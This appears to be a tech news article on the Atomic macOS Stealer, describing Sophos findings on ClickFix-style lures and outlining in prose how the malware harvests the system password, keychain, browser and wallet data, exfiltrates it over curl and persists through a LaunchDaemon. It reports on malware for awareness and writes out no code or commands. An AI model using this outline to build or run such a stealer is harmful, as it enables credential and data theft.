- AMOS relies on users to execute malicious terminal commands themselves
- Sophos MDR identified ClickFix-style social engineering in attacks on macOS
- Half of macOS thief reports involved AMOS, but Apple is fighting back
Atomic macOS Stealer, also known as AMOS, is a persistent macOS security threat because it does not need sophisticated zero-day vulnerabilities to compromise Apple devices.
Instead, this malware family repeatedly exploits normal user behavior by tricking them into typing a single command into their own Terminal application.
A recent incident investigated by Sophos MDR teams revealed exactly this pattern: a ClickFix-style ruse persuaded a victim to execute a line of malicious code manually.
AMOS uses psychological manipulation over technical exploits
This approach has become increasingly prominent, and researchers have noted similar social engineering tactics in multiple macOS data theft campaigns throughout 2025 and early 2026.
AMOS accounted for nearly 40% of all macOS protection updates deployed by Sophos in 2025, more than double the detection rate of any other macOS malware family during the same period.
Additionally, nearly half of all customer reports of macOS thieves in the past three months involved AMOS or its close variants.
Security companies have tracked this malware-as-a-service operation since at least April 2023, with notable campaigns including a variant called SHAMOS reported by CrowdStrike in August 2025.
In December 2025, Huntress documented infections spreading through poisoned search results related to ChatGPT and Grok conversations.
How malware collects passwords and data
After the initial Terminal command runs a boot script, the malware immediately prompts the user for their macOS system password.
The malicious code then validates this credential locally using a simple directory services command before storing it in a hidden file called .pass within the user’s home directory.
Once the password is protected, AMOS downloads a secondary payload that removes extended attributes to bypass macOS security warnings.
The thief also checks whether it is running inside a virtual machine or sandbox environment by querying the system_profiler data for flags such as QEMU, VMware or KVM.
The malware then proceeds to collect a wide range of sensitive information, including the macOS keychain database, Firefox and Chrome browser credentials, extension archive files, and local session tokens.
Some variants also deploy fake Ledger Wallet and Trezor Suite apps designed to steal seeds and credentials from cryptocurrency wallets.
All collected files are compressed into a single file using the ditto utility before being transmitted to attacker-controlled servers via curl POST requests.
To maintain long-term access, the malware installs a LaunchDaemon that ensures automatic execution after each system reboot.
Despite the seriousness of AMOS, it’s worth wondering whether security vendors are overstating its novelty, given that data thieves have been targeting Windows systems for nearly two decades.
The malware’s heavy reliance on user consent (someone must voluntarily paste and execute a Terminal command) creates a major barrier that technically literate users could easily avoid.
Additionally, Apple’s continued improvements to Gatekeeper, XProtect, and notarization requirements could render AMOS largely ineffective with a few OS updates.
The real danger may lie less in AMOS itself and more in the uncomfortable truth that no platform is immune to users who ignore basic security warnings.
Follow TechRadar on Google News and add us as a preferred source to receive news, reviews and opinions from our experts in your feeds.
